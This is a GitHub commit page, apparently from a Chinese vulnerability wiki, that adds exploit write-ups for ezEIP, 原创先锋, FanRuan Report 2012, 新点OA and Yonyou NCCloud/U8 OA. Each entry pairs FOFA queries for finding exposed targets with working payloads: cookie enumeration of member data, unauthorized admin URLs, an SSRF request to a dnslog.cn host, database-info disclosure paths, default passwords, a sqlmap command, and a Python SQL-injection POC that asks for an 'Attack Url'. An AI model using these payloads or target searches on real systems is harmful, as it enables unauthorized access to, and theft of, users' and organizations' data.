-
Notifications
You must be signed in to change notification settings - Fork 48
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
267 changed files
with
6,343 additions
and
482 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| # ezEIP | ||
|
|
||
| #### ezEIP 4.1.0 信息泄露漏洞 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| # ezEIP 4.1.0 信息泄露漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| ezEIP 4.1.0 存在信息泄露漏洞,通过遍历Cookie中的参数值获取敏感信息 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > ezEIP 4.1.0 | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > "ezEIP" | ||
| ## 漏洞复现 | ||
|
|
||
| 漏洞Url为 | ||
|
|
||
| ``` | ||
| /label/member/getinfo.aspx | ||
| ``` | ||
|
|
||
| 访问时添加Cookie(通过遍历获取用户的登录名电话邮箱等信息) | ||
|
|
||
| ``` | ||
| WHIR_USERINFOR=whir_mem_member_pid=1; | ||
| ``` | ||
|
|
||
|  |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| # 原创先锋 | ||
|
|
||
| #### 原创先锋 后台管理平台 未授权访问漏洞 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| # 原创先锋 后台管理平台 未授权访问漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 原创先锋 后台管理平台 存在未授权访问漏洞,攻击者通过漏洞可以任意接管账户权限 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 原创先锋 后台管理平台 | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > body="https://www.bjycxf.com" | ||
| ## 漏洞复现 | ||
|
|
||
| 后台登陆页面如下 | ||
|
|
||
|  | ||
|
|
||
| 未授权的Url | ||
|
|
||
| ``` | ||
| /admin/admin/admin_list.html | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| 点击添加并授权即可获取后台模块权限 | ||
|
|
||
|  | ||
|
|
||
| ## 参考文章 | ||
|
|
||
| http://www.0dayhack.net/index.php/1693/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -4,3 +4,7 @@ | |
|
|
||
| #### 帆软 V9 任意文件覆盖文件上传 | ||
|
|
||
| #### 帆软报表 2012 SSRF漏洞 | ||
|
|
||
| #### 帆软报表 2012 信息泄露漏洞 | ||
|
|
||
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| # 帆软报表 2012 SSRF漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取造成SSRF | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 帆软报表 2012 | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > body="down.download?FM_SYS_ID" | ||
| ## 漏洞复现 | ||
|
|
||
| 漏洞验证Url为 | ||
|
|
||
| ``` | ||
| /ReportServer?op=resource&resource=0m0m6k.dnslog.cn | ||
| ``` | ||
|
|
||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| # 帆软报表 2012 信息泄露漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 帆软报表 2012 | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > body="down.download?FM_SYS_ID" | ||
| ## 漏洞复现 | ||
|
|
||
| 获取登录报表系统的IP | ||
|
|
||
| ``` | ||
| http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| 数据库信息泄露 | ||
|
|
||
| ``` | ||
| http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| 后台默认口令 admin/123456 | ||
|
|
||
| ``` | ||
| /ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime() | ||
| ``` | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| # 新点OA | ||
|
|
||
| #### 新点OA 敏感信息泄露漏洞 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,31 @@ | ||
| # 新点OA 敏感信息泄露漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 新点OA 存在敏感信息泄露漏洞,访问特定的Url时可以获取所有用户的登录名信息,攻击者获取后可以进一步利用 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 新点OA | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > app="新点OA" | ||
| ## 漏洞复现 | ||
|
|
||
| 构造的Url为 | ||
|
|
||
| ``` | ||
| /ExcelExport/人员列表.xls | ||
| ``` | ||
|
|
||
| 将会下载人员列表文件 | ||
|
|
||
|  | ||
|
|
||
| 通过获取的登录名登陆后台(默认密码11111) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -6,3 +6,9 @@ | |
|
|
||
| #### 用友 NC XbrlPersistenceServlet反序列化 | ||
|
|
||
| #### 用友 U8 OA test.jsp SQL注入漏洞 | ||
|
|
||
| #### 用友ERP-NC 目录遍历漏洞 | ||
|
|
||
|
|
||
|
|
||
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,54 @@ | ||
| # 用友 NCCloud FS文件管理SQL注入 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 用友 NCCloud | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > "NCCloud" | ||
| ## 漏洞描述 | ||
|
|
||
| 登录页面如下 | ||
|
|
||
|  | ||
|
|
||
| 在应用中存在文件服务器管理登录页面 | ||
|
|
||
| ``` | ||
| http://xxx.xxx.xxx.xxx/fs/ | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| 登录请求包如下 | ||
|
|
||
| ``` | ||
| GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1 | ||
| Host: xxx.xxx.xxx.xxx | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate | ||
| Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 | ||
| Cookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.server | ||
| Connection: close | ||
| ``` | ||
|
|
||
| 使用Sqlmap对**username参数** 进行SQL注入 | ||
|
|
||
| ``` | ||
| sqlmap -r sql.txt -p username | ||
| ``` | ||
|
|
||
|  | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,81 @@ | ||
| # 用友 U8 OA test.jsp SQL注入漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 用友 U8 OA | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > "用友U8-OA" | ||
| ## 漏洞复现 | ||
|
|
||
| 可参考 文章 | ||
|
|
||
| [致远OA A6 test.jsp SQL注入漏洞](http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html) | ||
|
|
||
|
|
||
|
|
||
| 登录页面如下 | ||
|
|
||
|  | ||
|
|
||
| POC | ||
|
|
||
| ``` | ||
| /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1)) | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| 利用方法与致远OA 的SQL注入类似 | ||
|
|
||
| ## 漏洞POC | ||
|
|
||
| ```python | ||
| import requests | ||
| import sys | ||
| import random | ||
| import re | ||
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | ||
|
|
||
| def title(): | ||
| print('+------------------------------------------') | ||
| print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') | ||
| print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') | ||
| print('+ \033[34m公众号 : PeiQi文库 \033[0m') | ||
| print('+ \033[34mTitle : 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') | ||
| print('+ \033[36m使用格式: python3 poc.py \033[0m') | ||
| print('+ \033[36mFile >>> ip.txt \033[0m') | ||
| print('+------------------------------------------') | ||
|
|
||
| def POC_1(target_url): | ||
| vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" | ||
| headers = { | ||
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", | ||
| } | ||
| try: | ||
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | ||
| response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) | ||
| if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200: | ||
| print("\033[32m[o] 目标 {}存在漏洞 \n[o] 响应地址: {} \033[0m".format(target_url, vuln_url)) | ||
| else: | ||
| print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url)) | ||
| except Exception as e: | ||
| print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) | ||
|
|
||
| if __name__ == '__main__': | ||
| title() | ||
| target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) | ||
| POC_1(target_url) | ||
| ``` | ||
|
|
||
|  |
Oops, something went wrong.